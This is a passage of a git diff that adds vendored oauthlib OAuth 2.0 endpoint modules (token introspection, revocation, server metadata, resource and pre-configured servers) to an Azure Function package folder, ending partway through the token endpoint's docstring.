+""" +import functools +import logging + +from ..errors import ( + FatalClientError, InvalidClientError, InvalidRequestError, OAuth2Error, + ServerError, TemporarilyUnavailableError, UnsupportedTokenTypeError, +) + +log = logging.getLogger(__name__) + + +class BaseEndpoint: + + def __init__(self): + self._available = True + self._catch_errors = False + self._valid_request_methods = None + + @property + def valid_request_methods(self): + return self._valid_request_methods + + @valid_request_methods.setter + def valid_request_methods(self, valid_request_methods): + if valid_request_methods is not None: + valid_request_methods = [x.upper() for x in valid_request_methods] + self._valid_request_methods = valid_request_methods + + + @property + def available(self): + return self._available + + @available.setter + def available(self, available): + self._available = available + + @property + def catch_errors(self): + return self._catch_errors + + @catch_errors.setter + def catch_errors(self, catch_errors): + self._catch_errors = catch_errors + + def _raise_on_missing_token(self, request): + """Raise error on missing token.""" + if not request.token: + raise InvalidRequestError(request=request, + description='Missing token parameter.') + def _raise_on_invalid_client(self, request): + """Raise on failed client authentication.""" + if self.request_validator.client_authentication_required(request): + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + log.debug('Client authentication failed, %r.', request) + raise InvalidClientError(request=request) + + def _raise_on_unsupported_token(self, request): + """Raise on unsupported tokens.""" + if (request.token_type_hint and + request.token_type_hint in self.valid_token_types and + request.token_type_hint not in self.supported_token_types): + raise UnsupportedTokenTypeError(request=request) + + def _raise_on_bad_method(self, request): + if self.valid_request_methods is None: + raise ValueError('Configure "valid_request_methods" property first') + if request.http_method.upper() not in self.valid_request_methods: + raise InvalidRequestError(request=request, + description=('Unsupported request method %s' % request.http_method.upper())) + + def _raise_on_bad_post_request(self, request): + """Raise if invalid POST request received + """ + if request.http_method.upper() == 'POST': + query_params = request.uri_query or "" + if query_params: + raise InvalidRequestError(request=request, + description=('URL query parameters are not allowed')) + +def catch_errors_and_unavailability(f): + @functools.wraps(f) + def wrapper(endpoint, uri, *args, **kwargs): + if not endpoint.available: + e = TemporarilyUnavailableError() + log.info('Endpoint unavailable, ignoring request %s.' % uri) + return {}, e.json, 503 + + if endpoint.catch_errors: + try: + return f(endpoint, uri, *args, **kwargs) + except OAuth2Error: + raise + except FatalClientError: + raise + except Exception as e: + error = ServerError() + log.warning( + 'Exception caught while processing request, %s.' 
% e) + return {}, error.json, 500 + else: + return f(endpoint, uri, *args, **kwargs) + return wrapper diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/introspect.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/introspect.py new file mode 100644 index 0000000..5869d66 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/introspect.py @@ -0,0 +1,122 @@ +""" +oauthlib.oauth2.rfc6749.endpoint.introspect +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +An implementation of the OAuth 2.0 `Token Introspection`. + +.. _`Token Introspection`: https://tools.ietf.org/html/rfc7662 +""" +import json +import logging + +from oauthlib.common import Request + +from ..errors import OAuth2Error +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class IntrospectEndpoint(BaseEndpoint): + + """Introspect token endpoint. + + This endpoint defines a method to query an OAuth 2.0 authorization + server to determine the active state of an OAuth 2.0 token and to + determine meta-information about this token. OAuth 2.0 deployments + can use this method to convey information about the authorization + context of the token from the authorization server to the protected + resource. + + To prevent the values of access tokens from leaking into + server-side logs via query parameters, an authorization server + offering token introspection MAY disallow the use of HTTP GET on + the introspection endpoint and instead require the HTTP POST method + to be used at the introspection endpoint. + """ + + valid_token_types = ('access_token', 'refresh_token') + valid_request_methods = ('POST',) + + def __init__(self, request_validator, supported_token_types=None): + BaseEndpoint.__init__(self) + self.request_validator = request_validator + self.supported_token_types = ( + supported_token_types or self.valid_token_types) + + @catch_errors_and_unavailability + def create_introspect_response(self, uri, http_method='POST', body=None, + headers=None): + """Create introspect valid or invalid response + + If the authorization server is unable to determine the state + of the token without additional information, it SHOULD return + an introspection response indicating the token is not active + as described in Section 2.2. + """ + resp_headers = { + 'Content-Type': 'application/json', + 'Cache-Control': 'no-store', + 'Pragma': 'no-cache', + } + request = Request(uri, http_method, body, headers) + try: + self.validate_introspect_request(request) + log.debug('Token introspect valid for %r.', request) + except OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + resp_headers.update(e.headers) + return resp_headers, e.json, e.status_code + + claims = self.request_validator.introspect_token( + request.token, + request.token_type_hint, + request + ) + if claims is None: + return resp_headers, json.dumps(dict(active=False)), 200 + if "active" in claims: + claims.pop("active") + return resp_headers, json.dumps(dict(active=True, **claims)), 200 + + def validate_introspect_request(self, request): + """Ensure the request is valid. + + The protected resource calls the introspection endpoint using + an HTTP POST request with parameters sent as + "application/x-www-form-urlencoded". + + token REQUIRED. The string value of the token. 
+ + token_type_hint OPTIONAL. + A hint about the type of the token submitted for + introspection. The protected resource MAY pass this parameter to + help the authorization server optimize the token lookup. If the + server is unable to locate the token using the given hint, it MUST + extend its search across all of its supported token types. An + authorization server MAY ignore this parameter, particularly if it + is able to detect the token type automatically. + * access_token: An Access Token as defined in [`RFC6749`], + `section 1.4`_ + + * refresh_token: A Refresh Token as defined in [`RFC6749`], + `section 1.5`_ + + The introspection endpoint MAY accept other OPTIONAL + parameters to provide further context to the query. For + instance, an authorization server may desire to know the IP + address of the client accessing the protected resource to + determine if the correct client is likely to be presenting the + token. The definition of this or any other parameters are + outside the scope of this specification, to be defined by + service documentation or extensions to this specification. + + .. _`section 1.4`: http://tools.ietf.org/html/rfc6749#section-1.4 + .. _`section 1.5`: http://tools.ietf.org/html/rfc6749#section-1.5 + .. _`RFC6749`: http://tools.ietf.org/html/rfc6749 + """ + self._raise_on_bad_method(request) + self._raise_on_bad_post_request(request) + self._raise_on_missing_token(request) + self._raise_on_invalid_client(request) + self._raise_on_unsupported_token(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/metadata.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/metadata.py new file mode 100644 index 0000000..d18edc3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/metadata.py @@ -0,0 +1,238 @@ +""" +oauthlib.oauth2.rfc6749.endpoint.metadata +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +An implementation of the `OAuth 2.0 Authorization Server Metadata`. + +.. _`OAuth 2.0 Authorization Server Metadata`: https://tools.ietf.org/html/rfc8414 +""" +import copy +import json +import logging + +from .. import grant_types +from .authorization import AuthorizationEndpoint +from .base import BaseEndpoint, catch_errors_and_unavailability +from .introspect import IntrospectEndpoint +from .revocation import RevocationEndpoint +from .token import TokenEndpoint + +log = logging.getLogger(__name__) + + +class MetadataEndpoint(BaseEndpoint): + + """OAuth2.0 Authorization Server Metadata endpoint. + + This specification generalizes the metadata format defined by + `OpenID Connect Discovery 1.0` in a way that is compatible + with OpenID Connect Discovery while being applicable to a wider set + of OAuth 2.0 use cases. This is intentionally parallel to the way + that OAuth 2.0 Dynamic Client Registration Protocol [`RFC7591`_] + generalized the dynamic client registration mechanisms defined by + OpenID Connect Dynamic Client Registration 1.0 + in a way that is compatible with it. + + .. _`OpenID Connect Discovery 1.0`: https://openid.net/specs/openid-connect-discovery-1_0.html + .. 
_`RFC7591`: https://tools.ietf.org/html/rfc7591 + """ + + def __init__(self, endpoints, claims={}, raise_errors=True): + assert isinstance(claims, dict) + for endpoint in endpoints: + assert isinstance(endpoint, BaseEndpoint) + + BaseEndpoint.__init__(self) + self.raise_errors = raise_errors + self.endpoints = endpoints + self.initial_claims = claims + self.claims = self.validate_metadata_server() + + @catch_errors_and_unavailability + def create_metadata_response(self, uri, http_method='GET', body=None, + headers=None): + """Create metadata response + """ + headers = { + 'Content-Type': 'application/json', + 'Access-Control-Allow-Origin': '*', + } + return headers, json.dumps(self.claims), 200 + + def validate_metadata(self, array, key, is_required=False, is_list=False, is_url=False, is_issuer=False): + if not self.raise_errors: + return + + if key not in array: + if is_required: + raise ValueError("key {} is a mandatory metadata field.".format(key)) + + elif is_issuer: + if not array[key].startswith("https"): + raise ValueError("key {}: {} must be an HTTPS URL".format(key, array[key])) + if "?" in array[key] or "&" in array[key] or "#" in array[key]: + raise ValueError("key {}: {} must not contain query or fragment components".format(key, array[key])) + + elif is_url: + if not array[key].startswith("http"): + raise ValueError("key {}: {} must be a URL".format(key, array[key])) + + elif is_list: + if not isinstance(array[key], list): + raise ValueError("key {}: {} must be an Array".format(key, array[key])) + for elem in array[key]: + if not isinstance(elem, str): + raise ValueError("array {}: {} must contain only strings (not {})".format(key, array[key], elem)) + + def validate_metadata_token(self, claims, endpoint): + """ + If the token endpoint is used in the grant type, the value of this + parameter MUST be the same as the value of the "grant_type" + parameter passed to the token endpoint defined in the grant type + definition. + """ + self._grant_types.extend(endpoint._grant_types.keys()) + claims.setdefault("token_endpoint_auth_methods_supported", ["client_secret_post", "client_secret_basic"]) + + self.validate_metadata(claims, "token_endpoint_auth_methods_supported", is_list=True) + self.validate_metadata(claims, "token_endpoint_auth_signing_alg_values_supported", is_list=True) + self.validate_metadata(claims, "token_endpoint", is_required=True, is_url=True) + + def validate_metadata_authorization(self, claims, endpoint): + claims.setdefault("response_types_supported", + list(filter(lambda x: x != "none", endpoint._response_types.keys()))) + claims.setdefault("response_modes_supported", ["query", "fragment"]) + + # The OAuth2.0 Implicit flow is defined as a "grant type" but it is not + # using the "token" endpoint, as such, we have to add it explicitly to + # the list of "grant_types_supported" when enabled.
+ if "token" in claims["response_types_supported"]: + self._grant_types.append("implicit") + + self.validate_metadata(claims, "response_types_supported", is_required=True, is_list=True) + self.validate_metadata(claims, "response_modes_supported", is_list=True) + if "code" in claims["response_types_supported"]: + code_grant = endpoint._response_types["code"] + if not isinstance(code_grant, grant_types.AuthorizationCodeGrant) and hasattr(code_grant, "default_grant"): + code_grant = code_grant.default_grant + + claims.setdefault("code_challenge_methods_supported", + list(code_grant._code_challenge_methods.keys())) + self.validate_metadata(claims, "code_challenge_methods_supported", is_list=True) + self.validate_metadata(claims, "authorization_endpoint", is_required=True, is_url=True) + + def validate_metadata_revocation(self, claims, endpoint): + claims.setdefault("revocation_endpoint_auth_methods_supported", + ["client_secret_post", "client_secret_basic"]) + + self.validate_metadata(claims, "revocation_endpoint_auth_methods_supported", is_list=True) + self.validate_metadata(claims, "revocation_endpoint_auth_signing_alg_values_supported", is_list=True) + self.validate_metadata(claims, "revocation_endpoint", is_required=True, is_url=True) + + def validate_metadata_introspection(self, claims, endpoint): + claims.setdefault("introspection_endpoint_auth_methods_supported", + ["client_secret_post", "client_secret_basic"]) + + self.validate_metadata(claims, "introspection_endpoint_auth_methods_supported", is_list=True) + self.validate_metadata(claims, "introspection_endpoint_auth_signing_alg_values_supported", is_list=True) + self.validate_metadata(claims, "introspection_endpoint", is_required=True, is_url=True) + + def validate_metadata_server(self): + """ + Authorization servers can have metadata describing their + configuration. The following authorization server metadata values + are used by this specification. More details can be found in + `RFC8414 section 2`_ : + + issuer + REQUIRED + + authorization_endpoint + URL of the authorization server's authorization endpoint + [`RFC6749#Authorization`_]. This is REQUIRED unless no grant types are supported + that use the authorization endpoint. + + token_endpoint + URL of the authorization server's token endpoint [`RFC6749#Token`_]. This + is REQUIRED unless only the implicit grant type is supported. + + scopes_supported + RECOMMENDED. + + response_types_supported + REQUIRED. + + Other OPTIONAL fields: + jwks_uri, + registration_endpoint, + response_modes_supported + + grant_types_supported + OPTIONAL. JSON array containing a list of the OAuth 2.0 grant + type values that this authorization server supports. The array + values used are the same as those used with the "grant_types" + parameter defined by "OAuth 2.0 Dynamic Client Registration + Protocol" [`RFC7591`_]. If omitted, the default value is + "["authorization_code", "implicit"]". + + token_endpoint_auth_methods_supported + + token_endpoint_auth_signing_alg_values_supported + + service_documentation + + ui_locales_supported + + op_policy_uri + + op_tos_uri + + revocation_endpoint + + revocation_endpoint_auth_methods_supported + + revocation_endpoint_auth_signing_alg_values_supported + + introspection_endpoint + + introspection_endpoint_auth_methods_supported + + introspection_endpoint_auth_signing_alg_values_supported + + code_challenge_methods_supported + + Additional authorization server metadata parameters MAY also be used. 
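Pulling the claims above together: a provider built on one of the pre-configured servers might publish its metadata as in this minimal sketch, where the issuer and endpoint URLs are hypothetical and ``validator`` stands in for a concrete ``RequestValidator`` implementation::

    from oauthlib.oauth2 import MetadataEndpoint, Server

    server = Server(validator)  # validator: assumed RequestValidator
    metadata = MetadataEndpoint([server], claims={
        'issuer': 'https://provider.example.com',
        'authorization_endpoint': 'https://provider.example.com/authorize',
        'token_endpoint': 'https://provider.example.com/token',
    })
    # Typically served at /.well-known/oauth-authorization-server (RFC 8414).
    headers, body, status = metadata.create_metadata_response(
        'https://provider.example.com/.well-known/oauth-authorization-server')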
+ Some are defined by other specifications, such as OpenID Connect + Discovery 1.0 [`OpenID.Discovery`_]. + + .. _`RFC8414 section 2`: https://tools.ietf.org/html/rfc8414#section-2 + .. _`RFC6749#Authorization`: https://tools.ietf.org/html/rfc6749#section-3.1 + .. _`RFC6749#Token`: https://tools.ietf.org/html/rfc6749#section-3.2 + .. _`RFC7591`: https://tools.ietf.org/html/rfc7591 + .. _`OpenID.Discovery`: https://openid.net/specs/openid-connect-discovery-1_0.html + """ + claims = copy.deepcopy(self.initial_claims) + self.validate_metadata(claims, "issuer", is_required=True, is_issuer=True) + self.validate_metadata(claims, "jwks_uri", is_url=True) + self.validate_metadata(claims, "scopes_supported", is_list=True) + self.validate_metadata(claims, "service_documentation", is_url=True) + self.validate_metadata(claims, "ui_locales_supported", is_list=True) + self.validate_metadata(claims, "op_policy_uri", is_url=True) + self.validate_metadata(claims, "op_tos_uri", is_url=True) + + self._grant_types = [] + for endpoint in self.endpoints: + if isinstance(endpoint, TokenEndpoint): + self.validate_metadata_token(claims, endpoint) + if isinstance(endpoint, AuthorizationEndpoint): + self.validate_metadata_authorization(claims, endpoint) + if isinstance(endpoint, RevocationEndpoint): + self.validate_metadata_revocation(claims, endpoint) + if isinstance(endpoint, IntrospectEndpoint): + self.validate_metadata_introspection(claims, endpoint) + + # "grant_types_supported" is a combination of all OAuth2 grant types + # allowed in the current provider implementation. + claims.setdefault("grant_types_supported", self._grant_types) + self.validate_metadata(claims, "grant_types_supported", is_list=True) + return claims diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/pre_configured.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/pre_configured.py new file mode 100644 index 0000000..326202c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/pre_configured.py @@ -0,0 +1,216 @@ +""" +oauthlib.oauth2.rfc6749.endpoints.pre_configured +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various endpoints needed +for providing OAuth 2.0 RFC6749 servers. +""" +from ..grant_types import ( + AuthorizationCodeGrant, ClientCredentialsGrant, ImplicitGrant, + RefreshTokenGrant, ResourceOwnerPasswordCredentialsGrant, +) +from ..tokens import BearerToken +from .authorization import AuthorizationEndpoint +from .introspect import IntrospectEndpoint +from .resource import ResourceEndpoint +from .revocation import RevocationEndpoint +from .token import TokenEndpoint + + +class Server(AuthorizationEndpoint, IntrospectEndpoint, TokenEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring all four major grant types.""" + + def __init__(self, request_validator, token_expires_in=None, + token_generator=None, refresh_token_generator=None, + *args, **kwargs): + """Construct a new all-grants-in-one server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. 
+ :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.auth_grant = AuthorizationCodeGrant(request_validator) + self.implicit_grant = ImplicitGrant(request_validator) + self.password_grant = ResourceOwnerPasswordCredentialsGrant( + request_validator) + self.credentials_grant = ClientCredentialsGrant(request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + + AuthorizationEndpoint.__init__(self, default_response_type='code', + response_types={ + 'code': self.auth_grant, + 'token': self.implicit_grant, + 'none': self.auth_grant + }, + default_token_type=self.bearer) + + TokenEndpoint.__init__(self, default_grant_type='authorization_code', + grant_types={ + 'authorization_code': self.auth_grant, + 'password': self.password_grant, + 'client_credentials': self.credentials_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + + +class WebApplicationServer(AuthorizationEndpoint, IntrospectEndpoint, TokenEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Authorization code grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a new web application server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.auth_grant = AuthorizationCodeGrant(request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + AuthorizationEndpoint.__init__(self, default_response_type='code', + response_types={'code': self.auth_grant}, + default_token_type=self.bearer) + TokenEndpoint.__init__(self, default_grant_type='authorization_code', + grant_types={ + 'authorization_code': self.auth_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + + +class MobileApplicationServer(AuthorizationEndpoint, IntrospectEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Implicit code grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a new implicit grant server. 
+ + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.implicit_grant = ImplicitGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + AuthorizationEndpoint.__init__(self, default_response_type='token', + response_types={ + 'token': self.implicit_grant}, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) + IntrospectEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) + + +class LegacyApplicationServer(TokenEndpoint, IntrospectEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Resource Owner Password Credentials grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a resource owner password credentials grant server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.password_grant = ResourceOwnerPasswordCredentialsGrant( + request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + TokenEndpoint.__init__(self, default_grant_type='password', + grant_types={ + 'password': self.password_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + + +class BackendApplicationServer(TokenEndpoint, IntrospectEndpoint, + ResourceEndpoint, RevocationEndpoint): + + """An all-in-one endpoint featuring Client Credentials grant and Bearer tokens.""" + + def __init__(self, request_validator, token_generator=None, + token_expires_in=None, refresh_token_generator=None, **kwargs): + """Construct a client credentials grant server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. 
+ :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.credentials_grant = ClientCredentialsGrant(request_validator) + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + TokenEndpoint.__init__(self, default_grant_type='client_credentials', + grant_types={ + 'client_credentials': self.credentials_grant}, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer}) + RevocationEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) + IntrospectEndpoint.__init__(self, request_validator, + supported_token_types=['access_token']) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/resource.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/resource.py new file mode 100644 index 0000000..c43b211 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/resource.py @@ -0,0 +1,84 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import logging + +from oauthlib.common import Request + +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class ResourceEndpoint(BaseEndpoint): + + """Authorizes access to protected resources. + + The client accesses protected resources by presenting the access + token to the resource server. The resource server MUST validate the + access token and ensure that it has not expired and that its scope + covers the requested resource. The methods used by the resource + server to validate the access token (as well as any error responses) + are beyond the scope of this specification but generally involve an + interaction or coordination between the resource server and the + authorization server:: + + # For most cases, returning a 403 should suffice. + + The method in which the client utilizes the access token to + authenticate with the resource server depends on the type of access + token issued by the authorization server. 
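As a sketch of the client-credentials wiring above (``validator`` again an assumed ``RequestValidator``; the token URL and client credentials are placeholders)::

    import base64
    from oauthlib.oauth2 import BackendApplicationServer

    server = BackendApplicationServer(validator)
    creds = base64.b64encode(b'your_id:your_secret').decode()
    headers, body, status = server.create_token_response(
        'https://provider.example.com/token',  # hypothetical endpoint
        http_method='POST',
        body='grant_type=client_credentials',
        headers={'Authorization': 'Basic ' + creds},
    )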
Typically, it involves + using the HTTP "Authorization" request header field [RFC2617] with an + authentication scheme defined by the specification of the access + token type used, such as [RFC6750]:: + + # Access tokens may also be provided in query and body + https://example.com/protected?access_token=kjfch2345sdf # Query + access_token=sdf23409df # Body + """ + + def __init__(self, default_token, token_types): + BaseEndpoint.__init__(self) + self._tokens = token_types + self._default_token = default_token + + @property + def default_token(self): + return self._default_token + + @property + def default_token_type_handler(self): + return self.tokens.get(self.default_token) + + @property + def tokens(self): + return self._tokens + + @catch_errors_and_unavailability + def verify_request(self, uri, http_method='GET', body=None, headers=None, + scopes=None): + """Validate client, code etc, return body + headers""" + request = Request(uri, http_method, body, headers) + request.token_type = self.find_token_type(request) + request.scopes = scopes + token_type_handler = self.tokens.get(request.token_type, + self.default_token_type_handler) + log.debug('Dispatching token_type %s request to %r.', + request.token_type, token_type_handler) + return token_type_handler.validate_request(request), request + + def find_token_type(self, request): + """Token type identification. + + RFC 6749 does not provide a method for easily differentiating between + different token types during protected resource access. We estimate + the most likely token type (if any) by asking each known token type + to give an estimation based on the request. + """ + estimates = sorted(((t.estimate_type(request), n) + for n, t in self.tokens.items()), reverse=True) + return estimates[0][1] if len(estimates) else None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/revocation.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/revocation.py new file mode 100644 index 0000000..6933d04 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/revocation.py @@ -0,0 +1,126 @@ +""" +oauthlib.oauth2.rfc6749.endpoint.revocation +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +An implementation of the OAuth 2 `Token Revocation`_ spec (draft 11). + +.. _`Token Revocation`: https://tools.ietf.org/html/draft-ietf-oauth-revocation-11 +""" +import logging + +from oauthlib.common import Request + +from ..errors import OAuth2Error +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class RevocationEndpoint(BaseEndpoint): + + """Token revocation endpoint. + + Endpoint used by authenticated clients to revoke access and refresh tokens. + Commonly this will be part of the Authorization Endpoint. + """ + + valid_token_types = ('access_token', 'refresh_token') + valid_request_methods = ('POST',) + + def __init__(self, request_validator, supported_token_types=None, + enable_jsonp=False): + BaseEndpoint.__init__(self) + self.request_validator = request_validator + self.supported_token_types = ( + supported_token_types or self.valid_token_types) + self.enable_jsonp = enable_jsonp + + @catch_errors_and_unavailability + def create_revocation_response(self, uri, http_method='POST', body=None, + headers=None): + """Revoke supplied access or refresh token. 
+ + + The authorization server responds with HTTP status code 200 if the + token has been revoked successfully or if the client submitted an + invalid token. + + Note: invalid tokens do not cause an error response since the client + cannot handle such an error in a reasonable way. Moreover, the purpose + of the revocation request, invalidating the particular token, is + already achieved. + + The content of the response body is ignored by the client as all + necessary information is conveyed in the response code. + + An invalid token type hint value is ignored by the authorization server + and does not influence the revocation response. + """ + resp_headers = { + 'Content-Type': 'application/json', + 'Cache-Control': 'no-store', + 'Pragma': 'no-cache', + } + request = Request( + uri, http_method=http_method, body=body, headers=headers) + try: + self.validate_revocation_request(request) + log.debug('Token revocation valid for %r.', request) + except OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + response_body = e.json + if self.enable_jsonp and request.callback: + response_body = '{}({});'.format(request.callback, response_body) + resp_headers.update(e.headers) + return resp_headers, response_body, e.status_code + + self.request_validator.revoke_token(request.token, + request.token_type_hint, request) + + response_body = '' + if self.enable_jsonp and request.callback: + response_body = request.callback + '();' + return {}, response_body, 200 + + def validate_revocation_request(self, request): + """Ensure the request is valid. + + The client constructs the request by including the following parameters + using the "application/x-www-form-urlencoded" format in the HTTP + request entity-body: + + token (REQUIRED). The token that the client wants to get revoked. + + token_type_hint (OPTIONAL). A hint about the type of the token + submitted for revocation. Clients MAY pass this parameter in order to + help the authorization server to optimize the token lookup. If the + server is unable to locate the token using the given hint, it MUST + extend its search across all of its supported token types. An + authorization server MAY ignore this parameter, particularly if it is + able to detect the token type automatically. This specification + defines two such values: + + * access_token: An Access Token as defined in [RFC6749], + `section 1.4`_ + + * refresh_token: A Refresh Token as defined in [RFC6749], + `section 1.5`_ + + Specific implementations, profiles, and extensions of this + specification MAY define other values for this parameter using + the registry defined in `Section 4.1.2`_. + + The client also includes its authentication credentials as described in + `Section 2.3`_ of [`RFC6749`_]. + + .. _`section 1.4`: https://tools.ietf.org/html/rfc6749#section-1.4 + .. _`section 1.5`: https://tools.ietf.org/html/rfc6749#section-1.5 + .. _`section 2.3`: https://tools.ietf.org/html/rfc6749#section-2.3 + .. _`Section 4.1.2`: https://tools.ietf.org/html/draft-ietf-oauth-revocation-11#section-4.1.2 + ..
_`RFC6749`: https://tools.ietf.org/html/rfc6749 + """ + self._raise_on_bad_method(request) + self._raise_on_bad_post_request(request) + self._raise_on_missing_token(request) + self._raise_on_invalid_client(request) + self._raise_on_unsupported_token(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.py new file mode 100644 index 0000000..ffcfbc8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.py @@ -0,0 +1,119 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import logging + +from oauthlib.common import Request +from oauthlib.oauth2.rfc6749 import utils + +from .base import BaseEndpoint, catch_errors_and_unavailability + +log = logging.getLogger(__name__) + + +class TokenEndpoint(BaseEndpoint): + + """Token issuing endpoint. + + The token endpoint is used by the client to obtain an access token by + presenting its authorization grant or refresh token. The token + endpoint is used with every authorization grant except for the 